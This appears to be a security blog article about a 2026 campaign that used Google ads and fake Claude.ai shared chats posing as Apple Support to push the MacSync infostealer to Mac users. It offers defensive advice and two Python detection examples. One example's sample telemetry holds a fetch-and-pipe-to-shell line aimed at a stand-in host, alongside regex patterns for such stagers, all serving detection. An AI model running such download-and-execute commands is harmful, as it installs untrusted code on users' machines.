Sunday, May 10, 2026

Hackers Abuse Google Ads and Claude.ai Chats to Push Mac Malware: What Every Business Needs to Know

Photo by Tech Daily on Unsplash

Key Takeaways
  • Attackers created fake Claude.ai shared chats impersonating Apple Support to trick Mac users into pasting Terminal commands that silently install the MacSync infostealer malware.
  • Google-sponsored ads for queries like "Claude mac download" pointed to the legitimate claude.ai domain, bypassing Google's verification systems and fooling even security-savvy users.
  • MacSync targets 13 Chromium browsers, 4 Gecko browsers, over 80 crypto wallet extensions, macOS Keychain, and Telegram — making it one of the most comprehensive credential-theft tools seen on Mac.
  • One malicious shared chat page reached approximately 21,000 visits before Anthropic removed it — roughly 16 hours after the initial security report.

What Happened

On May 10, 2026, Berk Albayrak, a security engineer at Trendyol Group, uncovered a novel attack campaign that weaponized two of the most trusted names in tech: Google and Anthropic's Claude.ai. Here is how the attack worked in plain terms.

Users searching Google for phrases like "Claude mac download" encountered sponsored ads that appeared completely authentic — because the destination URL actually resolved to claude.ai, Anthropic's real website. Clicking through did not take victims to Anthropic's official download page. Instead, it landed them on a malicious Claude.ai shared chat. The shared-chat feature, designed to let users exchange AI conversations publicly, had been quietly hijacked by attackers.

Inside these shared chats, the attackers impersonated Apple Support and presented a polished "Claude Code on Mac" installation guide. Victims were instructed to open Terminal (a command-line interface — essentially a text-based control panel for your Mac) and paste in commands described as necessary for installation. Those commands silently downloaded and executed MacSync, an infostealer malware (software that quietly harvests your credentials and personal data and transmits them to attackers).

Albayrak identified at least two separate malicious chats, each using entirely different infrastructure, domains, and payloads, yet following an identical social engineering structure — clear evidence of a coordinated, professionally operated campaign. Security awareness among Mac users is the first and most critical line of defense against this type of threat, and this attack was specifically designed to defeat it.

Photo by Solen Feyissa on Unsplash

Why It Matters for Your Organization's Security

This attack is alarming not because it breaks new technical ground, but because it systematically dismantles the detection methods most organizations rely on. Understanding each layer helps sharpen your data protection strategy.

The Google ad problem is bigger than one campaign. Bitdefender discovered over 200 malicious Google ads impersonating popular Mac software in early 2026, with threat actors leveraging at least 35 breached Google Ads accounts belonging to law firms, hotels, and other legitimate businesses. When attackers control a real organization's Google Ads account, the ads pass platform verification checks — leaving users with almost no visual signal that something is wrong. Cybersecurity best practices have long included skepticism toward sponsored search results, but even experienced IT professionals can be fooled when the destination domain is genuinely legitimate.

Abusing trusted platforms invalidates standard threat intelligence checks. In this campaign, the Google ad legitimately resolved to claude.ai — Anthropic's actual domain — because the malicious content lived inside Claude's shared-chat feature, not on a spoofed site. Albayrak noted that this approach bypasses typical domain-spoofing detection heuristics (automated checks that flag lookalike URLs such as "c1aude.ai" or "anthropic-download.com"). Threat intelligence teams that rely heavily on domain reputation scoring need to update their models to account for trusted-domain abuse as a distinct attack class.
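To make the detection gap in the preceding paragraph concrete, here is an added example in Python (it is not code from the article or from any vendor product). It contrasts a domain-only reputation check, which sees nothing past the hostname, with a path-aware triage that routes user-generated content on a trusted domain to review and blocks lookalike names. The allowlist is a small constructed set, and the assumption that claude.ai shared chats live under a /share/ path is made for illustration only.

```python
"""Why a domain-reputation check passes the URL in this campaign, and what a
path-aware triage adds.

Added example, not from the article or from any vendor product. It assumes a
small static allowlist of trusted domains and a table of paths on those
domains where anyone can publish content; the "/share/" prefix for claude.ai
shared chats is an assumption made for illustration.
"""
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"claude.ai", "anthropic.com", "apple.com"}

# Assumed: paths under trusted domains that host user-generated content.
UGC_PATH_PREFIXES = {"claude.ai": ("/share/",)}

# Digit-for-letter swaps used in lookalike names such as "c1aude.ai".
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s"})


def registrable_domain(host: str) -> str:
    """Collapse subdomains to the registrable name. Naive last-two-labels
    rule; production code should use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def reputation_check(url: str) -> str:
    """What a domain-only reputation check sees: it never looks past the host."""
    domain = registrable_domain(urlparse(url).hostname or "")
    return "allow" if domain in TRUSTED_DOMAINS else "unknown"


def lookalike_of(domain: str):
    """Return the trusted domain that `domain` imitates, or None."""
    folded = domain.translate(CONFUSABLES)
    labels = domain.replace("-", ".").split(".")
    for trusted in sorted(TRUSTED_DOMAINS):
        brand = trusted.split(".")[0]
        if folded == trusted or brand in labels:
            return trusted
    return None


def triage(url: str) -> str:
    """Path-aware triage: a trusted host with a user-content path is sent to
    review instead of being waved through; lookalike names are blocked."""
    parsed = urlparse(url)
    domain = registrable_domain(parsed.hostname or "")
    if domain in TRUSTED_DOMAINS:
        for prefix in UGC_PATH_PREFIXES.get(domain, ()):
            if parsed.path.startswith(prefix):
                return "review:user-content-on-trusted-domain"
        return "allow"
    imitated = lookalike_of(domain)
    if imitated:
        return "block:lookalike-of-" + imitated
    return "unknown"


if __name__ == "__main__":
    for u in ("https://claude.ai/share/0000-constructed-id",
              "https://c1aude.ai/", "https://anthropic-download.com/mac"):
        print(u, reputation_check(u), triage(u))
```

The point is the first URL: `reputation_check` returns "allow" for it, exactly as the ad verification did, while `triage` returns a review verdict because the path sits in an area of the trusted site where anyone can publish. A real deployment would pull the user-content path table from the platforms it cares about and feed the review verdict into a block page or a ticket rather than a print statement.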

The "InstallFix" technique is more convincing than anything before it. Push Security researchers named this variant "InstallFix," distinguishing it from classic ClickFix attacks (which trick users into running pasted commands via fake CAPTCHA screens or error dialogs). As Push Security explained: "Traditional ClickFix attacks need to manufacture a reason for the user to run a command with a fake CAPTCHA or error message, but InstallFix doesn't need any of that — the pretext is simply the user wanting to install legit software, making it significantly more convincing." The plausibility of a straightforward software installation guide removes the psychological friction that might otherwise alert a careful user.

The payload is devastatingly thorough. MacSync targets 13 Chromium-based browsers (Chrome, Brave, Edge, and others) and 4 Gecko-based browsers (Firefox and related browsers), exfiltrating cookies, login data, and extension settings. It also targets over 80 cryptocurrency wallet browser extensions, macOS Keychain credentials (Apple's built-in system-level password vault), Telegram desktop data, and standalone crypto wallet applications. MacSync's latest variant evolved into a multistage loader-as-a-service model using code-signed and notarized Swift applications distributed via disk images — significantly raising its evasion capability compared to earlier versions. Data protection for Mac endpoints now explicitly requires defending against signed, notarized malware that macOS itself may trust.

AI tool users are a high-value, high-volume target. Pillar Security documented at least 20 distinct malware campaigns targeting AI and "vibe coding" tools between February and March 2026 alone, with over 15,600 victims publicly documented across those campaigns — nine targeting both Windows and macOS, and seven exclusively targeting macOS. Developers and technical users who work with AI tools tend to have broader system privileges and more sensitive credentials stored in their browsers, making them disproportionately attractive targets. Incident response planning should now explicitly include scenarios involving compromised AI tool installations.

The 16-hour gap between Albayrak's report and Anthropic's removal of a chat page that had already accumulated 21,000 visits underscores a platform-moderation lag that attackers will continue to exploit. Cybersecurity best practices mean not waiting for platforms to catch up — your organization needs its own layered defenses in place before the next campaign launches.

Photo by Theo Eilertsen Photography on Unsplash

The AI Angle

Building on the threat landscape above, it is worth examining how AI-powered security tools are adapting to detect trusted-platform abuse — and where the detection gaps still exist.

Modern threat intelligence platforms like CrowdStrike Falcon and SentinelOne incorporate behavioral analysis that can flag unexpected network connections initiated from Terminal commands, even when the malicious binary is code-signed and notarized. Because MacSync establishes outbound connections to attacker-controlled infrastructure immediately after execution, endpoint detection and response (EDR) tools — security software that monitors device behavior in real time — can catch the data exfiltration attempt even if they miss the initial download stage.

Browser-based security tools such as Malwarebytes Browser Guard can block known malicious domains used by MacSync as command-and-control servers, adding a layer of data protection before stolen credentials ever leave the device. DNS filtering solutions apply threat intelligence feeds at the network level, which is particularly valuable in enterprise environments managing large Mac fleets. Security awareness training platforms are already incorporating Claude.ai impersonation scenarios into phishing simulation libraries — a necessary evolution as AI platforms become primary attack surfaces rather than just tools.

What Should You Do? 3 Action Steps

1. Harden Your Mac Software Installation Workflow

Adopt and enforce a strict policy across your organization: software is installed only from the official developer website or the Mac App Store — never from instructions pasted into Terminal from a chat interface, forum, or ad-linked page. Train every Mac user to treat any chat interface (including Claude.ai, ChatGPT, and similar platforms) as an untrusted source for Terminal commands. Security awareness briefings covering this specific scenario — an AI chat impersonating Apple Support or a software installation guide — should be added to your next all-hands meeting or security onboarding session. Reinforce the policy with endpoint management tools such as Jamf or Mosyle for macOS fleets, which can restrict software installation without IT approval and alert on unauthorized Terminal activity.

2. Deploy Endpoint Detection and Browser-Level Protection on Every Mac

Install a macOS EDR solution that performs behavioral analysis, not just signature-based scanning (which compares files against a known-malware database and misses novel variants). Because MacSync's latest version is code-signed and notarized, traditional antivirus frequently misses it on first execution; behavioral detection of unexpected outbound network connections is your critical safety net. Complement EDR with a browser security extension that enforces threat intelligence-backed domain blocking. For high-risk users — developers, finance team members, and anyone holding cryptocurrency — deploy a YubiKey or other hardware security key for all critical service logins. A hardware security key uses FIDO2 authentication (a cryptographic standard that ties login to a physical device), meaning that even if MacSync exfiltrates every saved browser credential, attackers cannot replay those credentials without the physical key in hand. A hardware security key costs roughly $25–$50 and provides account protection that no password manager alone can replicate.
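The behavioral detection described in "The AI Angle" and in this step, as an added example in Python that is not code from the article or from any EDR vendor: it walks a stream of process and network events, marks a command line of the "fetch piped into a shell" shape as a stager when its lineage runs back to Terminal, and raises an alert for every outbound connection made within a short window by that stager or any of its descendants. The event schema (exec and connect records with pid, ppid, name, cmdline, path and signed fields) is an assumed simplification of what an endpoint agent exposes, and the sample telemetry is constructed; the signed flag is recorded but deliberately never used to suppress an alert, which is the property the paragraph above asks for.

```python
"""Behavioral detection of a Terminal-launched download-and-run chain,
correlated with the outbound connection that follows it.

Added example, not from the article or from any EDR vendor. The event
schema (exec/connect records with pid, ppid, name, cmdline, path, signed)
is an assumed simplification of what an endpoint agent exposes, and the
sample events are constructed to resemble the chain the article describes:
a pasted "curl ... | sh" line that ends up running a signed binary from a
temporary folder.
"""
import re

# Command-line shapes typical of "paste this into Terminal" installers.
STAGER_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),  # fetch piped into a shell
    re.compile(r"\bbase64\b.*(-d|--decode)\b"),        # decode-then-run payloads
]
USER_WRITABLE = ("/tmp/", "/private/tmp/", "/Users/", "/var/folders/")
WINDOW_S = 60  # a connect must follow the stager within this many seconds


def ancestry(pid, parent_of):
    """Process ids from `pid` up to the root, `pid` itself first."""
    chain = []
    while pid in parent_of and pid not in chain:
        chain.append(pid)
        pid = parent_of[pid]
    return chain


def detect(events):
    """Return one alert per outbound connection whose process lineage passes
    through a stager command that was itself spawned from Terminal. The code
    signature is reported but never used to suppress the alert, because the
    latest MacSync variant is signed and notarized."""
    parent_of, name_of, path_of, signed = {}, {}, {}, {}
    terminal_pids, stagers, alerts = set(), {}, []
    for ev in sorted(events, key=lambda e: e["ts"]):
        pid = ev["pid"]
        if ev["type"] == "exec":
            parent_of[pid] = ev["ppid"]
            name_of[pid] = ev["name"]
            path_of[pid] = ev.get("path", "")
            signed[pid] = ev.get("signed", False)
            if ev["name"] == "Terminal":
                terminal_pids.add(pid)
            cmd = ev.get("cmdline", "")
            if any(p.search(cmd) for p in STAGER_PATTERNS) and \
                    any(a in terminal_pids for a in ancestry(pid, parent_of)):
                stagers[pid] = (ev["ts"], cmd)
        elif ev["type"] == "connect":
            for anc in ancestry(pid, parent_of):
                if anc in stagers and ev["ts"] - stagers[anc][0] <= WINDOW_S:
                    alerts.append({
                        "pid": pid,
                        "process": name_of.get(pid),
                        "dest": ev["dest"],
                        "stager": stagers[anc][1],
                        "from_user_writable_path": path_of.get(pid, "").startswith(USER_WRITABLE),
                        "signed": signed.get(pid, False),
                    })
                    break
    return alerts


# Constructed sample telemetry (timestamps in seconds; destinations are documentation IPs).
SAMPLE_EVENTS = [
    {"ts": 0, "type": "exec", "pid": 100, "ppid": 1, "name": "Terminal",
     "path": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "signed": True},
    {"ts": 1, "type": "exec", "pid": 101, "ppid": 100, "name": "zsh", "cmdline": "-zsh",
     "path": "/bin/zsh", "signed": True},
    {"ts": 5, "type": "exec", "pid": 102, "ppid": 101, "name": "sh",
     "cmdline": "sh -c 'curl -fsSL https://installer.example/setup.sh | bash'",
     "path": "/bin/sh", "signed": True},
    {"ts": 6, "type": "exec", "pid": 103, "ppid": 102, "name": "curl",
     "cmdline": "curl -fsSL https://installer.example/setup.sh", "path": "/usr/bin/curl", "signed": True},
    {"ts": 7, "type": "connect", "pid": 103, "dest": "203.0.113.10:443"},
    {"ts": 8, "type": "exec", "pid": 104, "ppid": 102, "name": "bash", "cmdline": "bash",
     "path": "/bin/bash", "signed": True},
    {"ts": 9, "type": "exec", "pid": 105, "ppid": 104, "name": "Installer",
     "cmdline": "/private/tmp/Installer.app/Contents/MacOS/Installer",
     "path": "/private/tmp/Installer.app/Contents/MacOS/Installer", "signed": True},
    {"ts": 10, "type": "connect", "pid": 105, "dest": "198.51.100.7:443"},
    # Benign activity that must not alert: a browser, and a normal git pull in the same Terminal.
    {"ts": 20, "type": "exec", "pid": 200, "ppid": 1, "name": "Safari",
     "path": "/Applications/Safari.app/Contents/MacOS/Safari", "signed": True},
    {"ts": 21, "type": "connect", "pid": 200, "dest": "192.0.2.5:443"},
    {"ts": 30, "type": "exec", "pid": 106, "ppid": 101, "name": "git", "cmdline": "git pull",
     "path": "/usr/bin/git", "signed": True},
    {"ts": 31, "type": "connect", "pid": 106, "dest": "192.0.2.9:443"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run as-is, `detect(SAMPLE_EVENTS)` produces two alerts: the download by `curl` and, more importantly, the connection from the signed `Installer` binary executing out of `/private/tmp/`. The browser and the `git pull` from the same Terminal window produce nothing, which is the tuning that keeps a rule like this usable on a developer fleet. A production rule would also widen the stager patterns over time and feed `from_user_writable_path` and `signed` into severity scoring rather than into suppression.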

3. Build an Incident Response Runbook for Malicious Terminal Command Execution

Assume that some users will eventually run a malicious command despite training. Your incident response plan needs a specific playbook for this scenario: (1) immediately isolate the affected Mac from the network by disabling Wi-Fi and unplugging Ethernet to stop active data exfiltration; (2) do not reboot yet — volatile memory may contain forensic evidence; (3) revoke and rotate all credentials stored in the browser and macOS Keychain, prioritizing email, banking, and any services with cryptocurrency or admin access; (4) notify affected SaaS providers and force-expire all active sessions; and (5) preserve system logs before wiping the machine for forensic analysis. Because MacSync targets over 80 cryptocurrency wallet extensions, any user holding crypto assets should treat their wallet as fully compromised and move funds to a new wallet address immediately. Practicing this incident response runbook quarterly ensures data protection procedures are muscle memory when a real breach occurs, not a panicked scramble.

Frequently Asked Questions

How do hackers use Google ads to spread Mac malware without triggering Google's security checks?

In this campaign, attackers exploited the fact that their malicious content lived inside Claude.ai's legitimate shared-chat feature — not on a spoofed or lookalike website. When Google's ad verification system inspected the destination URL, it saw claude.ai (a well-established, trusted domain) and approved the ad. The harmful installation instructions were one click deeper, inside the shared chat page itself. This "trusted-platform abuse" bypasses domain-reputation checks entirely, which is why cybersecurity best practices now include skepticism toward sponsored search results even when the destination URL looks perfectly legitimate. Always navigate directly to software vendors' official websites rather than clicking ads.

How can I tell if a Claude.ai shared chat is a fake Apple Support page trying to install malware?

Anthropic does not provide technical support through Claude.ai shared chats, and Apple never instructs users to install software by pasting commands into Terminal. Any shared chat that claims to be "Apple Support" or presents itself as an official installation guide and asks you to run Terminal commands is fraudulent — regardless of how professional the formatting looks. Legitimate software installation from reputable vendors does not require copying commands from a chat interface. If you encounter a page like this, close it immediately without copying anything to your clipboard, and report it to Anthropic through their official abuse reporting channel. Building this critical evaluation habit is the foundation of security awareness for every Mac user.

What exactly does the MacSync infostealer steal from an infected Mac, and how serious is the damage?

MacSync is exceptionally comprehensive. It exfiltrates saved credentials, cookies, and extension data from 13 Chromium-based browsers (Chrome, Brave, Edge, Opera, and others) and 4 Gecko-based browsers (Firefox, Librewolf, and related browsers). It also harvests data from over 80 cryptocurrency wallet browser extensions, standalone crypto wallet applications, macOS Keychain (Apple's built-in system-level password storage), and Telegram desktop data. Its latest variant runs as code-signed and notarized Swift applications, meaning macOS's own Gatekeeper security feature will not flag it as untrusted. This breadth of exposure means that a single successful infection can compromise every saved password, active browser session, and crypto holding on the device — making rapid credential rotation and wallet migration the most time-sensitive response steps.

How do I protect my business from malware delivered through AI platform shared chats and similar attacks?

A layered approach is most effective. First, deploy an endpoint detection and response (EDR) solution on all company Macs that uses behavioral analysis to flag suspicious outbound network connections triggered by Terminal commands. Second, enforce a formal policy prohibiting software installation based on chat, forum, or ad-linked instructions, and back it up with mobile device management (MDM) controls. Third, issue hardware security keys such as YubiKeys for privileged and high-risk accounts — FIDO2-backed logins cannot be replayed with stolen credentials alone. Fourth, run threat intelligence-informed security awareness training that explicitly covers AI platform impersonation scenarios. Fifth, maintain an incident response runbook for the specific scenario of a user running a malicious Terminal command, so your team can act within minutes rather than hours.

What should I do immediately if I accidentally ran a Terminal command from a suspicious Claude.ai page or website?

Speed is critical — MacSync can begin exfiltrating data within seconds of execution. First, immediately disconnect the Mac from the internet: turn off Wi-Fi and unplug any Ethernet cable to cut off active data transmission. Do not reboot the machine yet, as volatile memory may hold forensic evidence. Contact your IT security team or your incident response provider right away. Begin rotating passwords for all accounts whose credentials were stored in the affected browser or macOS Keychain — prioritize email, banking, admin tools, and any cryptocurrency services. If you hold crypto assets, move them to a brand-new wallet address immediately and treat the old wallet as fully compromised. Document everything you remember about the page and the commands for your incident response report. Acting within the first 15 minutes dramatically limits the attacker's window for data theft and account takeover.

Disclaimer: This article is for informational purposes only and does not constitute professional security consulting advice. Always consult with a qualified cybersecurity professional for your specific needs.

Affiliate Disclosure: This post contains affiliate links to Amazon. As an Amazon Associate, we may earn a small commission from qualifying purchases made through these links — at no extra cost to you. This helps support our independent reporting. We only link to products we believe are relevant to the article. Thank you.
